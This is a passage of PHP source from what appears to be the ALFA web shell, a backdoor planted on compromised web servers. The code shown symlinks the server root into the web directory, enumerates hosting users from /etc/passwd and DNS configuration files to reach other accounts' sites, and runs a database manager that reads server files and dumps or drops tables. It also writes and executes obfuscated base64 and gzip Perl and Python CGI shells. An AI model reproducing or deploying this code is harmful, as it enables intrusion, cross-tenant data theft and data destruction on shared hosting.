DLBjHj8AZ85ig4A4lPFNrXpxTDDu6BOT3v17/VG8EhGRbYGCQIs0ON+FP/0y18cDAv7MBqE5Es01IZYLAFxhtKK8Mw18zHmQN0fW3rWagugklRROfxpF1oRdgSpXAOQQxsW54twCA4aadiaoSPo8zFcmnbHsju/T3o6xz2watvabyIMp1gMp1m92xY5toRSUdXywWcKC4O43ul4Wg+7geBFb/35dho74CYZTOs3sV6DJ2BA3/TIU3LdIadxAIkeR/PecVj17HjupPnga4Ud8Y/nfj6eCRodL3t5Z6Fo0qQKIIa2+/F6jqb/PBp1RsfT0HSRZqHpfE2z4ULzNXFnm18GFy4PjM6f567fBY8suVcoP5wa7Imy2po0NE01ZKKOk5FlRZ0APt4STsKB94v2+JnYTK7y4+NBg4RObgAJLcs7mIAQX8fbUqUYtqb+O6xxwa7S7610neeWC8Q5Rieo1elWTsrdcmmiQpLfQX7De7LnmB4nUfHlN/UlWpU4aDflKhyG+thzWKG/vXxOoWywpqB4zL6RKw3H8Jz2iQ4xkOxxNGnY57iRxoKjaWdvvjCJB3l3YZQMrZ1eFIEI9rRR2QTkOB6BvY7tnQSbbfouphPTidyTy1vnSJtJTWfneRfTGhqFvJ8vmlp19McnQau7KcCX1LfaPfTqCIOt6UaxiYLfo3cBWWuI5X/BDC8Gvshjh13LkpgjGd7Yu8DRDHcasCjVVZKmuljTFEExTREMvL8TvM7nLdgJ3cmVOtRsQrBnSfA+/1Q9VVMczKb2/C8UKHnLMcyLA7n79f6OPLC730C9XpnqrmdGv+i2J2cZF1QfHBVUy83XaWLWp4kRh6aTxaptb0wbEjaGRdO8eLatFGBOnhfVajIe1fsb23pdLbhSfGPmTOM2Gdd7QHO5BhvfLPVzY7u25VJ3bec9GfY7VztWrNZqsuBlbiZk8RebXP8dJIetz5JDiyhpTn6EPX8uZIEt43+JbZ3IPw7k3we15tU0AdNncPW3ZzEeuQcJu9wPxYZciSXxLru6toECUwT/zuhH3mJkF7M13gtOVpxkc30NE2wpzm/Omm6taJbZo+iN8Qes/YT+fNL+fHD+PFUf9XkvYSpne2jL73lZ8h04+SuIlE/VO31h4uKgCXRQLG9cQ8I8VXd5/gDJZHIJUAzqo17XBJMJf/Djb6Q2SQa0/4LDpYRj+tvkmByb5poQO6cAIHeXOoybeCcKxfpuxcxlJZf4/2Gvq3167Xp3DCfeXwVhexFlXcv2Tgnrp23UEO8m/r3DZCFUT00rd3EwKStYDheGC+jfcQ0Kx5JiKwBC/gejBmkk")),\'\',\'exec\'))';
	

	

	

	
 $cginame = "symperl.alfa";
	

	

	

	
 $source = $perl;
	

	

	

	
 $lang = "perl";
	

	

	

	
 if($_POST["alfa2"]=="sympy"){
	

	

	

	
 $cginame = "pysymlink.alfa";
	

	

	

	
 $source = $py;
	

	

	

	
 $lang = "python";
	

	

	

	
 }
	

	

	

	
 @__write_file($cginame,$source);
	

	

	

	
 @chmod($cginame,0755);
	

	

	

	
 echo __pre();
	

	

	

	
 $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
	

	

	

	
 if(strlen($resource) == 0){
	

	

	

	
 echo AlfaiFrameCreator('cgialfa/'.$cginame);
	

	

	

	
 }else{
	

	

	

	
 echo $resource;
	

	

	

	
 }
	

	

	

	
}
	

	

	

	
if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
	

	

	

	
if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
	

	

	

	
AlfaNum(9,10);
	

	

	

	
echo __pre().'
	

	

	

	

	

	


	

		

		

		
 

	

	
| Symlink File And Directory |

	

	


	

		

		

		
 

	

	

		

		

		

		

		

		
		

		

		

		

		

		

		

		
		

		

		

		

		

		


		

			

			
			
 

		
 
';
	

	

	

	
$path = $_POST['alfa5'];
	

	

	

	
$symname = $_POST['alfa6'];
	

	

	

	
$solevisible58 = $_POST['alfa7'];
	

	

	

	
if($solevisible58){
	

	

	

	
$new_name = str_replace(".", "_", basename($symname));
	

	

	

	
$rand_dir = $new_name.rand(111,9999);
	

	

	

	
$sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
	

	

	

	
@mkdir($sym_dir, 0777, true);
	

	

	

	
alfacgihtaccess('sym', $sym_dir, $symname);
	

	

	

	
_alfa_symlink("$path","$sym_dir/$symname");
	

	

	

	
echo __pre();
	

	

	

	
echo 'Click >> '.$symname.'';
	

	

	

	
}
	

	

	

	
}else{echo "
[+] Symlink Function Disabled !
";}
	

	

	

	
}
	

	

	

	
if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
	

	

	

	
$cant_symlink = true;
	

	

	

	
if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
	

	

	

	
@mkdir('alfasymlink',0777);
	

	

	

	
alfacgihtaccess('sym','alfasymlink/');
	

	

	

	
_alfa_symlink('/','alfasymlink/root');
	

	

	

	
$table_header = "
";

if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){

echo "";

$lines = array();

$anony_domains = array();

$anonymous_users = array();

$f_black = array();

$error = false;

$anonymous = false;

$makepwd = "/home/{user}/public_html/";

$domains = alfaGetDomains();

$lines = $domains["lines"];

$state = $domains["state"];

$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");

$can_runcmd = _alfa_can_runCommand(false,false);

if(!$is_posix && !$can_runcmd){

    $anonymous = true;

    $anony_domains = $domains["lines"];

    $lines = _alfa_file('/etc/passwd');

}

echo $table_header;

$count=1;

$template = '';

foreach($lines as $line){

    $domain = "";

    $owner = "";

    if($anonymous){

        $explode = explode(":", $line);

        $owner = $explode[0];

        $owner_len = strlen($owner) - 1;

        $userid = $explode[2];

        if((int)$userid < 500)continue;

        $domain = "[?????]";

        $temp_black = array();

        $finded = false;

        foreach($anony_domains as $anony){

            if($state == "named.conf"){

                if(@strstr($anony, 'zone')){

                    preg_match_all('#zone "(.*)"#',$anony, $data);

                    $domain = $data[1][0];

                }else{

                    continue;

                }

            }elseif($state == "named" || $state == "valiases"){

                if($anony == "." || $anony == "..")continue;

                if($state == "named")$anony = rtrim($anony, ".db");

                $domain = $anony;

            }

            $sub_domain = str_replace(array("-","."), "", $domain);

            if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){

                if(in_array($owner.$domain, $temp_black))continue;

                $sympath = str_replace("{user}", $owner, $makepwd);

                $http = "http://".$domain;

                echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);

                $count++;

                $temp_black[] = $owner.$domain;

                $finded = true;

            }

        }

        if(!$finded){

            $anonymous_users[] = $owner;

        }

    }else{

         if($state == "named.conf"){

            if(@strstr($line, 'zone')){

                preg_match_all('#zone "(.*)"#',$line, $data);

                $domain = $data[1][0];

            }else{

                continue;

            }

        }elseif($state == "named" || $state == "valiases"){

            if($line == "." || $line == "..")continue;

            if($state == "named")$line = rtrim($line, ".db");

            $domain = $line;

        }

        if(strlen(trim($domain)) > 2 && $state != "passwd"){

            if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;

            if($is_posix){

                $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));

                $owner = $user["name"];

            }elseif($can_runcmd){

                $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);

            }

        }

    }

    if(!$anonymous){

        if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;

        $sympath = str_replace("{user}", $owner, $makepwd);

        $http = "http://".$domain;

        if($state == "passwd"){

            $http = "javascript:alert('we cant find domain...')";

        }

        echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);

        $count++;

        $f_black[] = $owner.$domain;

    }

}

if($anonymous){

    foreach($anonymous_users as $owner){

        $sympath = str_replace("{user}", $owner, $makepwd);

        $http = "javascript:alert('we cant find domain...')";

        echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);

        $count++;

    }

}

$cant_symlink = false;

}else{

$is_direct = false;

$makepwd = alfaMakePwd();

if(_alfa_file_exists("/etc/virtual/domainowners")){

    $makepwd = "/home/{user}/public_html";

    $is_direct = true;

}

$sole = _alfa_file("/etc/virtual/domainowners");

$count=1;

echo $table_header;

$template = '';

if($sole){

    foreach($sole as $visible){

        if(@strstr($visible,":")){

            $solevisible = explode(':', $visible);

            $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);

            echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);

        }

    }

}else{

    $passwd = _alfa_file("/etc/passwd");

    if($passwd){

        $html = "";

        $is_named = false;

        $users = array();

        $domains = array();

        $uknowns = array();

        foreach($passwd as $user){

            $user = trim($user);

            $expl = explode(":", $user);

            if((int)$expl[2] < 500)continue;

            $users[$expl[0]] = $expl[5];

        }

        $site_domains = @scandir("/etc/virtual/");

        if(!$site_domains){

            $site_domains = alfaEx("ls /etc/virtual/");

            $site_domains = explode("\n", $site_domains);

            if(!$site_domains){

                $site_domains = _alfa_file("/etc/named.conf");

                if($site_domains){$is_named = true;}

            }

        }

        foreach($site_domains as $line){

            if($is_named){

                if(@strstr($line, 'zone')){

                    preg_match_all('#zone "(.*)"#',$line, $data);

                    $domain = $data[1][0];

                    if(strlen($domain  > 2) && !empty($domain)){

                        $domains[] = $domain;

                    }

                }

            }else{

                $domains[] = $line;

            }

        }

        $x = 1;

        foreach($users as $user => $home){

            foreach($domains as $domain){

                $user_len = strlen($user) - 1;

                $sub_domain = str_replace(array("-","."), "", $domain);

                $five_user = substr($user, 0,$user_len);

                $five_domain = substr($sub_domain, 0,$user_len);

                if($five_user == $five_domain){

                    if($is_direct){

                        $cwd = str_replace("{user}", $user, $makepwd);

                    }else{

                        $expl = explode("}/", $makepwd);

                        $cwd = $home."/".$expl[1];

                    }

                    $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);

                }else{

                    $uknowns[$user] = $home;

                }

            }

        }

        $uknowns = array_unique($uknowns);

        foreach($uknowns as $user => $home){

            if($is_direct){

                $cwd = str_replace("{user}", $user, $makepwd);

            }else{

                $expl = explode("}/", $makepwd);

                $cwd = $home."/".$expl[1];

            }

            $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);

        }

        echo($html);

    }

}

echo "
*DomainsUserssymlink
{count}{domain} {owner}Symlink
{count}{url} {user}Symlink
";

$cant_symlink = false;

}

}else{

    echo "
[+] Symlink Function Disabled !
";
	

	

	

	
 $cant_symlink = false;
	

	

	

	
}
	

	

	

	
if($cant_symlink)echo '
Error...
';

echo "
"; } echo "

"; alfafooter(); } function alfasql(){ class DbClass{ public $type; public $link; public $res; public $mysqli_connect_error = false; public $mysqli_connect_error_msg = ""; function __construct($type){ $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type){ case 'mysql': if($this->link = @mysqli_connect($host,$user,$pass,$dbname)){ return true; }else{ $this->mysqli_connect_error = true; $this->mysqli_connect_error_msg = mysqli_connect_error(); return false; } break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db){ switch($this->type){ case 'mysql': if(@mysqli_select_db($db))return true; break; } return false; } function query($str){ switch($this->type){ case 'mysql': return $this->res = @mysqli_query($this->link,$str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch(){ $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type){ case 'mysql': return @mysqli_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs(){ switch($this->type){ case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables(){ switch($this->type){ case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error(){ switch($this->type){ case 'mysql': return @mysqli_error($this->link); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str){ switch($this->type){ case 'mysql': if(function_exists('mysql_set_charset')) return @mysqli_set_charset($this->link,$str); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str){ switch($this->type){ case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table solevisible'); return array('file'=>implode("\n",$r)); break; } return false; } }; $db = new DbClass($_POST['type']); alfahead(); $form_visibility = "table"; if(isset($_POST['sql_host'])){ $connection_db = $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); if($connection_db && !empty($_POST['sql_base'])){ $form_visibility = "none"; } } $database_list = array(); echo "

".($form_visibility!="none"?"
| Sql Manager |

".getConfigHtml('all')."


":"")."
TYPE
HOST
DB USER
DB PASS
DB NAME
"; $tmp = " "; if(isset($_POST['sql_host'])){ if($connection_db){ $db->setCharset('utf8'); $db->listDbs(); echo " '; }else{ echo $tmp; } }else echo $tmp; $curr_mysql_id = $_POST['current_mysql_id']; echo "
count the number of rows
"; if($db->mysqli_connect_error){ echo '
'.$db->mysqli_connect_error_msg.'
'; } if(!empty($curr_mysql_id)){ $sql_title_db = ""; if(!empty($_POST['sql_base'])){ $sql_title_db = "d.querySelector('#tab_".$curr_mysql_id." span').innerHTML='".addslashes($_POST['sql_base'])."';"; } echo ""; } if(isset($db) && $db->link){ if(!empty($_POST['sql_base'])){ echo "
<<
Expand/Collapse All DataBases
  • "; foreach ($database_list as $db_name) { echo '
  • Expand/Collapse
    '.$db_name.'

    '; if($db_name == $_POST['sql_base']){ $db->selectdb($_POST['sql_base']); $tbls_res = $db->listTables(); echo '

    • '; while($item = $db->fetch($tbls_res)){ list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `'.$value.'`')); $value = htmlspecialchars($value); echo "

    • ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
    • "; } echo '
    '; } echo "
  • "; } echo "
Result
Query
Search
Structure
Insert




Query:






"; } echo "
"; echo "
"; }else{ echo htmlspecialchars($db->error()); } echo '
'; alfafooter(); } function alfaSql_manager_api(){ $db = $_POST["alfa1"]; $type = $_POST["alfa2"]; $sql_count = $_POST["alfa3"] == "true" ? true : false; $db = @json_decode($db, true); $conn = @mysqli_connect($db["host"], $db["user"], $db["pass"], $db["db"]); @mysqli_set_charset($conn, "utf8"); if($conn){ if($type == "load_all_tables"){ $tables = array(); $q_tables = @mysqli_query($conn, "SELECT `table_schema`, `table_name` FROM `information_schema`.`tables` WHERE `table_schema` IN ('".implode("','", $db["databases"])."');"); $count = 0; while($row = @mysqli_fetch_assoc($q_tables)){ if($sql_count){ $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row["table_schema"].'`.`'.$row["table_name"].'`'); if($count_q){ $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[$row["table_schema"]][] = array("name" => $row["table_name"], "count" => (int)$count); } foreach($db["databases"] as $db){ if(!isset($tables[$db])){ $tables[$db] = null; } } echo @json_encode($tables); }elseif($type == "dump_drop"){ if($db["mode"] == "drop"){ foreach ($db["tables"] as $table) { @mysqli_query($conn, "DROP TABLE `".$table."`;"); } $tables = array(); $q_tables = @mysqli_query($conn, "SHOW TABLES;"); $count = 0; while($row = @mysqli_fetch_array($q_tables)){ if($sql_count){ $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`'); if($count_q){ $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[] = array("name" => $row[0], "count" => (int)$count); } echo @json_encode($tables); }else{ if(strlen(alfaEx("mysqldump"))>0){ alfaEx("mysqldump --single-transaction --host=\"".$db["host"]."\" --user=\"".$db["user"]."\" --password=\"".$db["pass"]."\" ".$db["db"]." ".implode(" ", $db["tables"])." > ".$db["dump_file"]); }else{ $fp = @fopen($db["dump_file"], "w"); foreach ($db["tables"] as $table) { $res = @mysqli_query($conn, 'SHOW CREATE TABLE `'.$table.'`'); $create = @mysqli_fetch_array($res); $sql = "DROP TABLE IF EXISTS `".$table."`;\n" . $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $tbl_data = @mysqli_query($conn, 'SELECT * FROM `'.$table.'`'); $head = true; while($item = @mysqli_fetch_assoc($tbl_data)){ $columns = array(); foreach($item as $k=>$v) { if($v == null) $item[$k] = "''"; elseif(is_numeric($v)) $item[$k] = $v; else $item[$k] = "'".@mysqli_real_escape_string($conn, $v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; $head = false; } else $sql = "\n\t,(".implode(", ", $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); } } echo @json_encode(array("status" => true, "file" => $db["dump_file"])); } }elseif($type == "load_tables"){ $tables = array(); $q_tables = @mysqli_query($conn, "SHOW TABLES;"); $count = 0; while($row = @mysqli_fetch_array($q_tables)){ if($sql_count){ $count_q = @mysqli_query($conn, 'SELECT COUNT(*) FROM `'.$row[0].'`'); if($count_q){ $count = @mysqli_fetch_row($count_q); $count = $count[0]; } } $tables[] = array("name" => $row[0], "count" => (int)$count); } echo @json_encode($tables); }elseif($type == "alter"){ $db["alter"]["type"] = strtolower($db["alter"]["type"]); $inputs = $db["alter"]["type"]."(".$db["alter"]["input"].")"; $text_input = array("longtext", "text", "mediumtext", "tinytext"); if(in_array($db["alter"]["type"], $text_input)){ $inputs = $db["alter"]["type"]; } @mysqli_query($conn, "ALTER TABLE `".$db["table"]."` MODIFY COLUMN `".$db["column"]."` " . $inputs); $error = @mysqli_error($conn); if($error){ echo $error; }else{ echo "ok"; } }elseif($type == "edit" || $type == "delete" || $type == "delete_all"){ if($type == "edit"){ $q = @mysqli_query($conn, "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` = '".addslashes($db["key"])."' LIMIT 0,1"); $row = @mysqli_fetch_assoc($q); if($row){ $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE, DATA_TYPE as type FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'"); $columns = array(); $edit_data = array(); while($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){ $input = array("col_type" => $row2["COLUMN_TYPE"]); $row2["type"] = strtolower($row2["type"]); switch($row2["type"]){ case "longtext": case "text": case "mediumtext": case "tinytext": $input["tag"] = "textarea"; break; case "int": case "smallint": case "bigint": case "tinyint": case "mediumint": $input["tag"] = "input"; $input["type"] = "number"; break; default: $input["tag"] = "input"; $input["type"] = "text"; } $columns[$row2["name"]] = $input; } foreach($row as $key => $v){ $edit_data[] = array("col" => $key, "value" => htmlspecialchars($v, ENT_QUOTES, 'UTF-8'), "type" => $columns[$key]); } echo @json_encode($edit_data); } }else{ if($type == "delete_all"){ $rows = implode("', '", $db["rows"]); }else{ $rows = addslashes($db["key"]); } $query = "DELETE FROM `".$db["db"]."`.`".$db["table"]."` WHERE `".$db["col_key"]."` IN ('".$rows."')"; @mysqli_query($conn, $query); $error = @mysqli_error($conn); if($error){ $status = false; }else{ $status = true; } echo @json_encode(array("status" => $status, "error" => $error, "query" => $query)); } }elseif($type == "update"){ $query = "UPDATE `".$db["db"]."`.`".$db["table"]."` SET "; foreach($db["data"] as $col => $val){ $query .= "`".$col."` = '".mysqli_real_escape_string($conn, $val)."',"; } $query = substr($query, 0, -1); $query .= "WHERE `".$db["col_key"]."` = '".$db["key"]."'"; $res = @mysqli_query($conn, $query); echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn))); }elseif($type == "insert"){ $query = "INSERT INTO `".$db["db"]."`.`".$db["table"]."` "; foreach($db["data"] as $col => $val){ $cols .= $col . ","; $vals .= "'".mysqli_real_escape_string($conn, $val)."',"; } $cols = substr($cols, 0, -1); $vals = substr($vals, 0, -1); $query = $query . "(" . $cols . ")" . "VALUES(" . $vals . ")"; $res = @mysqli_query($conn, $query); echo @json_encode(array("status" => $res, "error" => @mysqli_error($conn))); }else{ $pages = 0; $title = false; $query = ""; $tbl_content = ''; $line = 0; $tables = array(); $columns = array(); if($type == "load_data"){ $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT 0,30"; $tbl_count_q = @mysqli_query($conn, "SELECT COUNT(*) FROM `".$db["db"]."`.`".$db["table"]."`"); $tbl_count = @mysqli_fetch_row($tbl_count_q); $columns_query = @mysqli_query($conn, "SELECT COLUMN_NAME as name, COLUMN_TYPE as type, COLLATION_NAME as collation, DATA_TYPE as data_type, CHARACTER_MAXIMUM_LENGTH as type_value FROM information_schema.columns WHERE `TABLE_SCHEMA` = '".$db["db"]."' AND `TABLE_NAME` = '".$db["table"]."'"); while($row2 = @mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){ $columns[] = $row2; } if($tbl_count[0] > 30){ $pages = ceil($tbl_count[0] / 30); } }elseif($type == "query"){ $query = $db["query"]; }elseif($type == "page"){ $db["page"] = (int)$db["page"] - 1; $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT ".($db["page"]*30).",30"; }elseif($type == "search"){ $search = ""; $search_noval = array("= ''", "!= ''", "IS NULL", "IS NOT NULL"); foreach($db["search"] as $col => $val){ $search_noval_r = in_array($val["opt"], $search_noval); if(empty($val["value"]) && !$search_noval_r)continue; if(strstr($val["opt"], "...") || $search_noval_r){ $val["opt"] = str_replace("...", $val["value"], $val["opt"]); $search .= $col . " " . $val["opt"] . " AND "; }else{ $search .= $col . " " . $val["opt"] . " '".addslashes($val["value"])."' AND "; } } $search .= "1=1"; $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE " . $search; } $q_tables = @mysqli_query($conn, $query); if(!$q_tables){ echo @json_encode(array("status" => false, "error" => @mysqli_error($conn), "query" => $query)); return false; } $col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($db["db"])."' AND TABLE_NAME = '".@addslashes($db["table"])."' AND COLUMN_KEY = 'PRI'"); if($col_key){ $col_key = @mysqli_fetch_row($col_key); $col_key = $col_key[0]; if(!empty($col_key)){ $tbl_content = '
'; } }else{ $col_key = false; } while($item = @mysqli_fetch_assoc($q_tables)){ if(!$title){ $tbl_content .= ''; if($col_key){ $tbl_content .= ''; } foreach($item as $key => $value){ $tbl_content .= ''; } reset($item); $title=true; $tbl_content .= ''; } if($col_key){ $cacheMsg = ''; } $tbl_content .= ''.$cacheMsg; $line++; foreach($item as $key => $value){ if($value == null){ $tbl_content .= ''; }else{ $tbl_content .= ''; } } $tbl_content .= ''; } $tbl_content .= '
Edit Delete '.$key.'
Edit Delete
null '.nl2br(htmlspecialchars($value)).'
'; if(!$title){ $tbl_content = "
Table is empty...
"; } echo @json_encode(array("status" => true, "table" => $tbl_content, "columns" => $columns, "pages" => $pages, "query" => $query)); } @mysqli_close($conn); } } function alfaselfrm(){ if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){ echo(__pre().''); if(@unlink($GLOBALS['__file_path'])){ echo('Shell has been removed :)'); }else{ echo 'unlink error!'; } echo(''); } if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){ echo "
"; echo "

"; echo '


Do you want to destroy me?!
Yes'; echo '


'; } } function alfacgishell(){ alfahead(); $div = ""; alfaCreateParentFolder(); @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__); if(!in_array($_POST['alfa1'],array('perl','py'))){ $div = "

"; echo '


| CGI Shell |


| Perl | | Python | '; } if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){ @mkdir('cgialfa',0755); @chdir('cgialfa'); alfacgihtaccess('cgi'); $name = $_POST['alfa1'].'.alfa'; $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("H4sIAAAAAAAA/6UZDXfTRvKvLBthSRBbtktazrJcQuJA3iUhlxju9aJgZGlt70OWVH2QpMb97Tezu7KkEKC0yUORZud7ZmdmlyJj5PT4dDwYvPQy9vMzuwDAEQ+ZBETeignQwU1AdG+WTRMvX+q25i/4NOApcQg8EcsoFw2ta5q29l8enU1guWtrZ5ODVXDJEviiLWprbyN+W0FsgBzEq5UXBRO+YnGRHxapl/M4gtUekF8u45vDO5DB/TdFnhQ5wm0NtBKC4WvB8jBe8Ih8/ozvyU3BA0MbmvhNvXDuoYhSoKFU+5VUig1ITSlTIJ+DwXVk6gcU8GhyE1DAOAdL7/OjritQLES4YOAY5udx2sQh/VGrR3qjVl/g4ltPwIAoK2bkgnnBuZeCy9dh7HshMZ7wyAQeL6aEz+FpK7DGd4kG7/D8yO7g+ckLQe5pEeY88dL8KE5Xh17uAak2Pnu31g/enE3GZ5Pp5Lfzsb4hzp/EWpXIrjUH9HYA+DaZxUUUeOmdY3Semppl87khOVyM//N2fDmZno4nr98cAg/2O6GvxhNqrjUebQUB0sVv08vJxfHZK31jb1iYfZvF+ZtL5JGC6cbl5PD4DKzh0e49vU/GZ68mr/WNaW+27P6uTaDwSwUBtfV2W+9oPftFyDPMriwJeW5YWxRL6APOfQ0asvRlHCCVhthXvesmGDRwUzfCf5/hT2SVy0jxwdZKYr18/ZNkgkKzAJVHa30Ouw+VRnuIQKpYAHdcxrx3XIq2uLQkk/i92pdgTS1rcR+WIQy8A0nk9G1licav4ZU/fQrOKQES/33nqZAoVKwvAXfDvVFKQBYqBSATlYniDVkY742GW0zzswBo8KWZQsUt7mOj0zGtxPM/GtSnu2TJbg2tZ5rWgglDUJKwFSjsDaYXW78Q+acC1yoDBiYyz1/CBzG6pNMh2g6AMVkr49ynFgHxRm0XVZwcyQmxd0nfVEZ+V8kfNKUDZdDtUtzfRsDmPGJQvspVLKZ1TGX1BovF2ySMvQDL9dpfxomhTbwUCuAZBMsU3GoAdNhBkaYsyg95aqJ+K+vKdV3rGva4Nkm9KJuzFJmJtUfG1XvrvetePzG1R3adESqh6h/uGrWEhJf8D5TDo9yAJF1gM2hmtEksqOn9ZyYWlThhkfH2/OTN/uHR8cl4l9BRTQw1zfWMR6s4YDUkYZaspnaSgiBSrZF7wmw/jLMGsSKhpbEsIPe1//fLjhtRhahPlowgQ0L1zkz1w4aXOzolN15GChEJ4JcVvs+ybF6E4V1Hl8mppB55qBr0mkfUlvE7xwUUrQIJ9YqsNSxbWJWGPsSKpaOhAMQRUKx47tB8ybOO/OgEPPNmwNXJ04LZYiXoQIYUzJnlsWcUEct8L2EGi3zw5NuLY+i1SRwBZ6OObUKaUQJI+V3CHLotolUNpWTF8mUcOLJcE8/HHu2AY7RLP+VJfgJ9CUHgktEw9GYsJEDsUOWaFKBZ4kWEA4vpdI6uLBIAWggdkWGWp3G0GLWiWZbY8nmwjCGCxBMxAESJMbQE99GQRzgNZPldCCqDJ5LQuxtEYByYglK2ksF5/tKLFogW+8UKrO9ABMchw9eXd8eB4epbnVzd7PAoYunryemJI7yE8rOr7nVHDESUSC8hlBJRGumckgzyx6E/7dFSM7kiI1XSlF8yRkrFLYXEWfIgYFHJOdgig6urHSzc/HUq70sRIpbwR6WVLhr7FKwSTThleZFGog3jCxFpaNcTWEGqzD33Fkx2prU2FvkVVPo16439EIJoDFfvvfYf++3/ddv/ujYt/bHeKSJZMF8/obtQLC22KPftQQyaR3kbDR6QnN3m1jJfhdhQtlt2iJDRcAl6jYY5z0M2OkDBZHZH9k+O9smE7Z+SNjl4dUzOWRoOLYk0FHk0erKGCTSEEiwTabOzTYv1HPyYD0jKF8vcjj+xFAA3A+l224/DOB3s9Pfm827XvuFBvhz0nnWTW7tMTCiLyLc9g6Hto43Kt7dMCAtDnmQ8s2+WPGdt2BI+WBjFN6mX2BuR7+sVlB0etYX8AZRR4A30OYdxsO2FfBENyAqUCZk9i1MICuAktySLQx4QKHX2DLy6SHGmAd9hBYQNDt4E7Nt2tvQC1KMLv8+Aaqc7/qn7bF9xaqdewItsgEvKNtLfQwV+xAy/SDPwEUlijgn4FcdIY4nc6+u6zmiDikHI5nmpSE94YiO2wpXYCnKPXa+VwFJenZcI7sNukpEkcYoF4yEHbHb8VbD+W9xK3/2CKj8QzwekJV4Q8GjRVk7KcqjKA7L35QpDTRC+waBAaD3YyliTlH6NvK5pX1O+FFzTpW7PzpH4KQUPej8Dmkr8vef+3t7zMvG73cfVDvGKPLY3WL5xgw0tuTVnOP3GEdamb1VlcDXW4zkgZAb2qNlCSHToTlf8QGGNE+lKh8IXpkbtU74KtWrfS4ZOFwB0FjCTpkGVrJouVBMlCgJJR1dkOKtKCXiEkcwLSAvS9xPPOHRh8qcAq68XixU0/I4fr4bWbESusf5GeVV/hzl2biLd7NAeDBJSS/QeJT7sJdw/4GihJ34rxzu0D4rmyCJoECmt57DrHPqOpYEXeWVfQhJQo2HXTr8/7vefi5XLSnNysOCqNs5GSm0CtTeC8yxYn8cEm